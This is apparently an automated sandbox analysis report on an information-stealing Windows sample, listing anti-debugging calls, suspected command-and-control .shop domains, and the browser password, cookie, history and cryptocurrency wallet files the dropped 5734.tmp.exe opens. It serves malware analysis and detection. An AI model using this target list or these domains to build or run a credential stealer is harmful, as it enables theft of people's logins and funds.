        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_00442080 LdrInitializeThunk,3_2_00442080
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A3D3
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0041EC5E
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_0042FE5F mov eax, dword ptr fs:[00000030h]0_2_0042FE5F
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_00600083 push dword ptr fs:[00000030h]0_2_00600083
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_006700C6 mov eax, dword ptr fs:[00000030h]0_2_006700C6
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_0064092B mov eax, dword ptr fs:[00000030h]0_2_0064092B
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_00640D90 mov eax, dword ptr fs:[00000030h]0_2_00640D90
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_02080083 push dword ptr fs:[00000030h]3_2_02080083
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020B092B mov eax, dword ptr fs:[00000030h]3_2_020B092B
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020B0D90 mov eax, dword ptr fs:[00000030h]3_2_020B0D90
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_0043BBC1 GetProcessHeap,0_2_0043BBC1
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A3D3
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_004104D3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004104D3
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_00410666 SetUnhandledExceptionFilter,0_2_00410666
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_0040F911 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040F911
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_0066A63A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0066A63A
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_0065073A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0065073A
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_006508CD SetUnhandledExceptionFilter,0_2_006508CD
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_0064FB78 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0064FB78

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: 5734.tmp.exeString found in binary or memory: cloudewahsj.shop
        Source: 5734.tmp.exeString found in binary or memory: rabidcowse.shop
        Source: 5734.tmp.exeString found in binary or memory: noisycuttej.shop
        Source: 5734.tmp.exeString found in binary or memory: tirepublicerj.shop
        Source: 5734.tmp.exeString found in binary or memory: framekgirus.shop
        Source: 5734.tmp.exeString found in binary or memory: wholersorie.shop
        Source: 5734.tmp.exeString found in binary or memory: abruptyopsn.shop
        Source: 5734.tmp.exeString found in binary or memory: nearycrepso.shop
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeProcess created: C:\Users\user\AppData\Local\Temp\5734.tmp.exe "C:\Users\user\AppData\Local\Temp\5734.tmp.exe" Jump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_0041077B cpuid 0_2_0041077B
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_0043B00A
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: GetLocaleInfoW,0_2_004351C0
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: EnumSystemLocalesW,0_2_0043B2CD
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: EnumSystemLocalesW,0_2_0043B282
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: EnumSystemLocalesW,0_2_0043B368
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0043B3F5
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: GetLocaleInfoW,0_2_0043B645
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0043B76E
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: GetLocaleInfoW,0_2_0043B875
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0043B942
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: EnumSystemLocalesW,0_2_00434DCD
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: EnumSystemLocalesW,0_2_00675034
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_0067B271
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: GetLocaleInfoW,0_2_00675427
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: EnumSystemLocalesW,0_2_0067B4E9
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: EnumSystemLocalesW,0_2_0067B534
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: EnumSystemLocalesW,0_2_0067B5CF
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: GetLocaleInfoW,0_2_0067B8AC
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0067B9D5
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: GetLocaleInfoW,0_2_0067BADC
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0067BBA9
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_004103CD GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_004103CD
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_004163EA GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,__CxxThrowException@8,0_2_004163EA
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
        Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
        Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
        Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
        Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
        Source: Yara matchFile source: Process Memory Space: 5734.tmp.exe PID: 3544, type: MEMORYSTR
        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
        Source: 5734.tmp.exe, 00000003.00000002.2291082783.00000000004C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
        Source: 5734.tmp.exe, 00000003.00000002.2291082783.00000000004C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
        Source: 5734.tmp.exe, 00000003.00000002.2291082783.00000000004B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
        Source: 5734.tmp.exe, 00000003.00000002.2291082783.00000000004C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
        Source: 5734.tmp.exe, 00000003.00000002.2291082783.00000000004C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
        Source: 5734.tmp.exe, 00000003.00000002.2291082783.00000000004B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
        Source: 5734.tmp.exe, 00000003.00000002.2291082783.00000000004C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
        Source: 5734.tmp.exe, 00000003.00000002.2291082783.00000000004C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
        Source: 5734.tmp.exe, 00000003.00000002.2291082783.00000000004C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.jsonJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
